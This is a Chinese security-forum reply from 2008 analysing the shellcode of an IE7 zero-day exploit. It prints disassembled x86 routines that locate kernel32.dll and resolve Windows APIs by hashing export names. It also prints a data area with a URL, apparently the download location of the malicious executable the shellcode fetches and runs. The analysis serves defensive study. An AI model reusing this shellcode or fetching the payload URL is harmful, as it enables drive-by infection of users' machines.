|
卡卡技术团队
- 帖子:8368
- 注册:
2006-01-09
- 来自:
|
发表于:
2008-12-12 20:15
|
只看楼主
短消息
资料
回复: 【原创】IE7 0DAY漏洞所用shellcode的分析
Getkernel32: ; 得到kernel32.dll的基址,这一块太common了。在WIN9X和NT以上采用不同的代码。
004074D7 > 33C0 xor eax, eax 004074D9 64:8B40 30 mov eax, dword ptr fs:[eax+30] 004074DD 85C0 test eax, eax 004074DF 78 10 js short 004074F1 004074E1 3E:8B40 0C mov eax, dword ptr [eax+C] 004074E5 3E:8B70 1C mov esi, dword ptr [eax+1C] 004074E9 AD lods dword ptr [esi] 004074EA 3E:8B40 08 mov eax, dword ptr [eax+8] 004074EE C3 retn 004074EF EB 0B jmp short 004074FC 004074F1 3E:8B40 34 mov eax, dword ptr [eax+34] 004074F5 83C0 7C add eax, 7C 004074F8 3E:8B40 3C mov eax, dword ptr [eax+3C] 004074FC C3 retn
GetAPIFromExport: ; 根据DLL模块基址和函数名加密HASH值,遍历DLL的输出表找到API函数地址,这也是common的模块。
004074FD > 60 pushad 004074FE 36:8B6C24 24 mov ebp, dword ptr [esp+24] 00407503 36:8B45 3C mov eax, dword ptr [ebp+3C] 00407507 36:8B5405 78 mov edx, dword ptr [ebp+eax+78] 0040750C 03D5 add edx, ebp 0040750E 3E:8B4A 18 mov ecx, dword ptr [edx+18] 00407512 3E:8B5A 20 mov ebx, dword ptr [edx+20] 00407516 03DD add ebx, ebp 00407518 E3 3B jecxz short 00407555 0040751A 49 dec ecx 0040751B 3E:8B348B mov esi, dword ptr [ebx+ecx*4] 0040751F 03F5 add esi, ebp 00407521 33FF xor edi, edi 00407523 33C0 xor eax, eax 00407525 FC cld 00407526 AC lods byte ptr [esi] 00407527 84C0 test al, al 00407529 74 07 je short 00407532 0040752B C1CF 0D ror edi, 0D 0040752E 03F8 add edi, eax 00407530 ^ EB F4 jmp short 00407526 00407532 36:3B7C24 28 cmp edi, dword ptr [esp+28] 00407537 ^ 75 DF jnz short 00407518 00407539 3E:8B5A 24 mov ebx, dword ptr [edx+24] 0040753D 03DD add ebx, ebp 0040753F 66:3E:8B0C4B mov cx, word ptr [ebx+ecx*2] 00407544 3E:8B5A 1C mov ebx, dword ptr [edx+1C] 00407548 03DD add ebx, ebp 0040754A 3E:8B048B mov eax, dword ptr [ebx+ecx*4] 0040754E 03C5 add eax, ebp 00407550 36:894424 1C mov dword ptr [esp+1C], eax 00407555 61 popad 00407556 C3 retn
LastCode: 00407557 E8 66FBFFFF call 004070C2
DataArea: 0040755C ASCII: "http://down.zhahaa.cn/down/new.exe"
病毒样本请发到可疑文件交流区
|